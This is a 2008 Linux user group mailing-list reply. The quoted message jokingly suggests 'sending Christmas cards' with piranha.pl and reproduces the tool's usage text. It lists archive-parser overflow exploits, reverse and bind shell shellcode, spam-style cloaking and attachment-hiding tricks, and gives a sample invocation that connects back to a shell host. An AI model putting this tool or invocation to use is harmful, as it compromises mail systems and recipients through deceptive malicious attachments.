That's twisted but funny On 12/25/08, Lisa Kachold <lisakach...@obnosis.com> wrote: > > > > > > > > > > > Send some Christmas cards: > > $ piranha.pl -e 4 -c 1 -l mynewshellhost -h mail.mydomain.com -a > myn...@mydomain.com > > > Usage: piranha.pl [MANDATORY ARGS] [OPTIONAL ARGS] > > Mandatory arguments: > -e+ Exploit number to use (See below) > -h+ SMTP server to test > -a+ Destination email address used in probing > > Optional arguments: > -s+ Shellcode type to inject into exploits (See below) > -c+ Cloaking style (See below) > -d+ Try to vanish attachments from MUA's view (See below) > -v Attach EICAR virus to improve stealthness > -z Pack all the malware into a tarball to be less noisy > -p+ Port to use in reverse shell or bind shell > -l+ Host to connect back in reverse shell mode > > Valid exploits numbers: > 0 OSVDB #5753: LHA get_header File Name Overflow > 1 OSVDB #5754: LHA get_header Directory Name Overflow > 2 OSVDB #6456: file readelf.c tryelf() ELF Header Overflow > 3 OSVDB #11695: unarj Filename Handling Overflow > 4 OSVDB #23460: ZOO combine File and Dir name overflow > 5 OSVDB #15867: Convert UUlib uunconc integer overflow > 6 OSVDB #XXX: ZOO next offset infinite loop DoS > > Valid shellcode types: > 0 TCP reverse shell > 1 UDP reverse shell > 2 TCP bind shell > > Valid cloaking styles (consult whitepaper for visual result): > 0 No cloaking at all (default) > 1 Viagra spam message > 2 "Look at the pictures I promised you!" > > Vanishing techniques for attachments: > 0 No vanishing at all (default) > 1 Multipart/alternative trick > 2 <img src="image.JPG" width=0 height=0> trick > > www.Obnosis.com | http://en.wiktionary.org/wiki/Citations:obnosis | > hackfest.obnosis.com (503)754-4452 > January PLUG HackFest = Kristy Westphal, AZ Department of Economic Security > Forensics @ UAT 1/10/09 12-3PM > Take the Black [Linux XP/Vista BackTrack3] Pill & leave SecurityMatrix, or > take the Blue [XP/Vista Update] Pill & stay happily ignorant. > > http://uncyclopedia.wikia.com/wiki/Satan_Claus > _________________________________________________________________ > Send e-mail anywhere. No map, no compass. > http://windowslive.com/oneline/hotmail?ocid=TXT_TAGLM_WL_hotmail_acq_anywhere_122008
-- Sent from my mobile device A mouse trap, placed on top of your alarm clock, will prevent you from rolling over and going back to sleep after you hit the snooze button. Stephen --------------------------------------------------- PLUG-discuss mailing list - PLUG-discuss@lists.plug.phoenix.az.us To subscribe, unsubscribe, or to change your mail settings: http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
